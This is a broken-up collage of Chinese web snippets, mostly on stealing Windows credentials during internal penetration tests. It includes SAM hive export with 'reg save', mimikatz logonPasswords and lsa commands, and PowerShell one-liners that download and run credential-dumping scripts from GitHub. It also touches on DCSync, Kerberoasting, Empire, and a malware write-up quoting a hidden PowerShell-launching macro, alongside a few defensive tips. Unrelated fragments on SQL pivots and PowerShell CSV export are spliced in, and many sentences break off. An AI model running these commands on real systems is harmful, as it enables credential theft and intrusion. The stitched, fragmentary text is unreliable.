在域环境中,用户信息存储在 ntds.dit 中,加密后为散列值。...Windows Hash 散列值抓取 要想在 Windows 操作系统中抓取散列值或明文密码,必须将权限提升为 System。本地用户名,散列值和其他安全验证信息都保存在 SAM 文件中。...可以使用工具将散列值和明文密码从内存中的 lsass.exe 进程或 SAM 文件中导出。...---- 通过 SAM 和 System 文件抓取密码 (1)导出 SAM 和 System 文件:通过 reg 的注册表导出 reg save hklm\sam sam.hive reg save hklm...最后运行命令导出密码散列值: sekurlsa::logonPasswords full ? ---- 参考文章: https://zhuanlan.zhihu.com/p/220277028
动态数据透视表(将行转换为列)您的代码如下所示:SET @sql = NULL;SELECT GROUP_CONCAT(DISTINCT CONCAT( ‘count(case
SELECT 'DROP '||'TABLE ' || TABLE_NAME ||' ;' ,1 FROM USER_TABLES WHERE TABLE_NAME LIKE 'T_DIM%'; 4、将结果拼接成字符串
、彩虹表等来破解,也可以使用PTH(Pass the Hash 哈希传递)来进行横向渗透 2、单机密码抓取 可以使用工具将散列值和明文密码从内存中的lsass.exe进程或SAM文件中导出 本地用户名、...Windows的本地安全策略和登陆策略 要想在Windows操作系统中抓取散列值或明文密码,必须将权限提升至System (1)抓取 导出SAM文件和system文件,然后通过mimikatz或者Cain...4、防范 防范措施: Windows Server 2012 R2新增了一个名为受保护的用户组(Protected Users),只要将需要保护的用户放入该组,攻击者就无法使用mimikatz等工具抓取明文密码和散列值了...mimikatz在抓取散列值或明文密码时需要使用Debug权限(因为mimikatz需要和lsass进程进行交互)。...PowerShell-AD-Recon工具包提供了一系列服务与服务登录账号和运行服务的主机之间的对应关系,下载地址: https://github.com/PyroTek3/PowerShell-AD-Recon
他们大量滥用合法工具(Living-off-the-Land Binaries, LOLBins),如PowerShell、WMI、PsExec,配合定制化轻量级后门(如Phoenix、BugSleep...Rust,这门由Mozilla孵化、以“内存安全”和“零成本抽象”闻名的系统级编程语言,近年来在开源社区和企业开发中迅速崛起。但如今,它也成了国家级黑客的新宠。1....宏代码通常经过混淆,例如:Sub AutoOpen()Dim x As String: x = "powershell -ep bypass -c ..."...Shell (x), vbHideEnd Sub实际执行的是从Pastebin或GitHub Gist拉取的PowerShell下载器;载荷投递:下载器从伪装成云存储的C2服务器获取RustyWater...公共互联网反网络钓鱼工作组技术专家芦笛指出:“我们过去重点监控PowerShell和VBS,现在必须把Rust、Go、Nim等现代语言编译的二进制纳入高危对象清单。”
5、nishang抓取主机密码: Nishang是一款针对PowerShell的渗透工具,除了可以抓取密码还可以进行端口扫描、提权、密码爆破等功能,这款工具依赖系统权限(有点小瑕疵),今天只是说一下抓密码的功能...你在PowerShell执行Get-ExecutionPolicy命令来查看默认的策略组: ?...我们需要修改策略组,在PowerShell下执行Set-ExecutionPolicy remotesigned,将策略值改为remotesigned,这样我们就可以运行脚本: ?...执行抓取用户的明文密码: (1) powershell –exec bypass –Command "& {Import-Module'C:\Windows\System32\WindowsPowerShell...Pwdump7是Pwdump3e的改进版,该程序能够从Windows目标中提取出NTLM和LanMan口令散列值,而不管是否启用了Syskey(这是一个Windows账户数据库加密工具,是Windows
目录 Windows中对用户密码的处理 LM-hash NTLM-hash 复制SAM文件 抓取明文密码或密码Hash 使用 mimikatz 抓取内存中的密码 使用mimikatz...读取域控上所有域用户的Hash值 使用PowerShell命令抓取内存中的密码 PwDump7抓取密码 HashQuarksPwDump抓取密码Hash 通过SAM和System...而NTLM Hash是微软为了在提高安全性的同时保证兼容性而设计的散列加密算法。NTLM Hash是基于MD4加密算法进行加密的。...::lsa /patch 3 使用PowerShell命令抓取内存中的密码 读取密码明文(需要管理员权限) #远程读取 powershell IEX (New-Object Net.WebClient...\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f 2:使用PowerShell
使用目标服务帐户的NTLM密码散列对TGS进行加密并发送给用户(TGS-REP)。 用户在适当的端口上连接到托管服务的服务器并呈现TGS(AP-REQ)。该服务使用其NTLM密码散列打开TGS票证。...wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi 没复现成功 凭证盗窃 最常用的手法域管理登录历史记录,记得获取某边界权限一个然后抓取散列并没有域管理的...,可能是搞的动静有点大,管理员第二天上去把马给清除了,还好留了有后门再次抓取哈希直接获取到域管理员。...防:管理员不应该拿着域用户去登录web服务器或者邮件服务器一但这些被攻破抓取的密码就是域了 地址解析协议 最后才是ARP欺骗不到最后不要拿出来。...使用Mimikatz的DCSync和相应的权限,攻击者可以通过网络从域控制器中提取密码散列以及以前的密码散列,而无需交互式登录或复制Active Directory数据库文件(ntds.dit) 运行DCSync
LM Hash 的话,我们抓到的 LM Hash 就是 AAD3B435B51404EEAAD3B435B51404EE,所以在 Vista 和 Windows Server 2003 之后的系统里抓取到的...下面看下常见的抓取密码的工具。...raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes" 5、mimikatz 说到密码抓取...mimikatz 是法国技术大神 Benjamin Delpy 使用 C 语言写的一款轻量级系统调试工具,该工具可以从内存中提取明文密码、散列值、PIN 和 K8S 票据,还可以执行哈希传递、票据传递、...details/108149449 原文链接: https://teamssix.com/210813-120018.html ---- 往期推荐 内网学习笔记 | 26、ntds.dit 的提取与散列值导出
二、 windows系统散列值获取分析与防范 windows操作系统通常会对用户的明文进行加密处理,在域环境下,用户信息存储在ntds.dit中,加密后为散列值。...1 LM HASh 和NTLM HASH 2 单机密码抓取与防范 1.GETPAss 下载下来,运行x64位的程序,直接获得系统所有用户的密码,简直不要太牛。...6.使用powershell对散列值进行DUmp操作 7.使用Powershell远程加载mimikatz抓取散列值和明文密码 3.单机密码抓取的防范方法 安装微软发布的KB2871997补丁 关闭Wdigest...功能(Windows Server 2012版本以上默认关闭) 1.使用reg add命令 2.使用powershell 三、 使用hashcat获取密码 kali rolling自带的密码破解工具,支持破解...3、 如何防范攻击者抓取明文密码和散列值 1.设置Active Directory 2012 R2 功能级别 2.安装KB2871997 3.通过修改注册表禁止在内存中存储明文密码 4.防御mimikatz
在PowerShell中我们也可以通过各种Get-XXX命令获得各种各样需要的数据,但是并不是所有操作系统和各个版本的PowerShell都支持某个命令的。...我们可以使用Export-Csv命令将PowerShell中的对象转换为CSV格式,持久化到磁盘上。...对应的PowerShell命令是Select-Object,可以简写为Select。该命令后面跟上要选取的列名即可。如果是要选取所有的列,也可以使用*表示。...Calculate计算列 在SELECT的时候,我们可以使用函数对其中的列进行运算,使用的语法是: @{ n='New Column Name'; e={ $_.xxxCalc } } 其中的...比如VM列记录的是以Byte为单位的数据,我们先新建一列名为”VM(MB)”,其值是换算成MB的结果,那么我们可以写为: $data | select Name,VM,@{n="VM(MB)";e={$
攻击特征 1.病毒会创建计划任务持续使用PowerShell.exe下载其他恶意程序。 2.病毒运行挖矿程序占用计算机资源,影响正常使用。 3.病毒运行木马程序用于自身持久化驻留和操控计算机。...运行程序,此程序会调用Mimikatz脚本,进行本机用户和密码的抓取, 同时创建计划任务,每天固定时间点自动向XX.beahh.com发送http请求下载域名解析后服务器上的程序,并以HTA(内含微软某...该病毒获取到用户名或密码时,无论是爆破还是抓取到的用户名密码,通过IPC$登陆后,对中病毒机器执行以下命令进行远程下载执行,同时设置端口转发,将来自65532端口的流量转发到1.1.1.1地址的53端口...释放powershell脚本文件并执行mimikatz模块,运行mimi操作后,释放了另一个配置文件 ? mkatz.ini文件中为抓取到的用户密码hash值 ?...释放PowerShell脚本并执行,命令行参数为 ? 判断自身所在的路径,如果不是则拷贝自身到当前用户的缓存目录中再次启动: ?
何为powershell执行策略 PowerShell 是一个跨平台的任务自动化解决方案,由命令行 shell、脚本语言和配置管理框架组成。...PowerShell 在 Windows、Linux 和 macOS 上运行。 由于powershell有以下性质,往往受到管理员或者安全人员的青睐。...type xxx.ps1 | PowerShell.exe -noprofile - powershell的Get-Content命令从磁盘读取你的脚本并输入到标准的PowerShell中。...此外,这个命令还有一个比较夸张的功能:可以抓取远程主机的策略并应用到当前主机。 这里测试了一下工作组。...把ExcutionPolicy设置成Process Scope,无需管理员权限。可以看到直接能够执行脚本。
Powershell关键命令介绍 我们将在这介绍三种简单的但是很关键的命令,这些命令能够让你的 Powershell之旅更加顺利。...命令的最后是-autosize, 他让Powershell每列的宽度自动调整适应。 ....幸好,这个现象没有在Powershell中出现。...隐藏的Powershell 关于About文件 在Powershell文件夹里面(又被称为 $PSHome **), 你会发现全部的关于(about)文件。...Get-process get-mem(tab键)会自动扩展成:get-process get-member. 你可能也知道了,tab键的自动完成不但对某个命令起作用,对于所有的命令都起作用。
下载下来留着 查看当前网卡,只有一块网卡,继续横向渗透 当前也不再域中 抓取hash 388f586516a4cba963b4181363b44034 先使用小工具探测IP存活,发现了一台131...机器 或者使用arp -a 在使用端口扫描工具进行端口扫描,发现了开放的22、80、3333、8888其中888是bt面板 抓取浏览器密码为空。...登录成功 vim key && chmod 600 key 2.2 win2008 SMB弱口令 当前机器是有两块网卡: 首先关闭防火墙,这样就可以通155这台机器了 Linux上线,使用C2生成linux...的后渗透模块定位到了域控制器,使用net time /domain提示我没权限,还可以使用端口爆破的方式查找域控制器: run post/windows/gather/enum_domain 提升一下权限: 抓取密码进行破解忘记截图了...: win2008 qweASD123 2.3 约束性委派 查找设置了约束性委派的主机或者域用户,可以使用ADFind,powershell脚本和kali自带的ldapsearch。
Empire是针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透测试攻击框架,具有stager生成提权、权限维持的功能。...Empire无需powershell.exe就能运行power shell代理的功能,有许多后期漏洞利用模块。类似于msf。 在kali中安装 在kali中安装很简单,我们只需执行下面命令即可。...sudo apt install powershell-empire 启动服务端 这个和我们之前讲过的cs一样。有客户端和服务端。...我们先来启动Empire powershell服务端 powershell-empire server 启动Empire powershell 客户端 powershell-empire client...由于命令比较多,这里我列举常用的一些命令 进入系统cmd shell 使用内置的mimikatz抓取hash和密码 mimikatz 设备详细信息 info 总结 empire模块和msf一样,功能很强大
p=981 内网文件传输 windows下文件传输 1、powershell文件下载 powershell突破限制执行:powershell -ExecutionPolicy Bypass -File...t=156643 win8+win2012明文抓取 修改一个注册表就可以抓取了 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders...mimikatz 只能抓取登陆过的用户hash,无法抓取所有用户,需要免杀 1、本机测试直接获取内存中的明文密码 privilege::debug sekurlsa::logonpasswords...加载mimikatz抓取密码 powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com...:Const FileName = "wmi1.dll",也可以加入-persist参数(后台运行) 另外有一个uac问题 非域用户登陆到win08和2012中,只有administrator可以登陆成功
p=981 ###内网文件传输 #####windows下文件传输 1、powershell文件下载 powershell突破限制执行:powershell -ExecutionPolicy Bypass...t=156643 #####win8+win2012明文抓取 修改一个注册表就可以抓取了 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders...#####mimikatz 只能抓取登陆过的用户hash,无法抓取所有用户,需要免杀 1、本机测试直接获取内存中的明文密码 privilege::debug sekurlsa::logonpasswords...加载mimikatz抓取密码 powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com...:Const FileName = "wmi1.dll",也可以加入-persist参数(后台运行) 另外有一个uac问题 非域用户登陆到win08和2012中,只有administrator可以登陆成功
简单的看了下机器环境,出网,没有杀软(后面发现实际是有一个很小众的防火墙的,但是不拦powershell),有内网环境。...运行刚刚生成的powershell 这边的CS成功上线。 这里我们先来看看系统的信息。...一瞬间我的思路就清晰了,只需要在本地安装Veeam® Backup & Replication这软件,再将这台DC的全量备份包压缩传到本地,再恢复成虚拟机,然后通过PE,用CMD.EXE重命名覆盖了OSK.exe...接着在本地通过Veeam恢复出备份的vmdk虚拟硬盘,在Vmware虚拟机中加载vmdk虚拟硬盘和PE镜像文件,将cmd.exe重命名为OSK.exe上线CS抓取哈希值。...最后再利用抓取到的哈希对目标那台DC主机进行PTH攻击,接下来就是对域进行信息搜集和深入渗透了......! 不得不说作者渗透经验丰富、思路清晰,值得一学!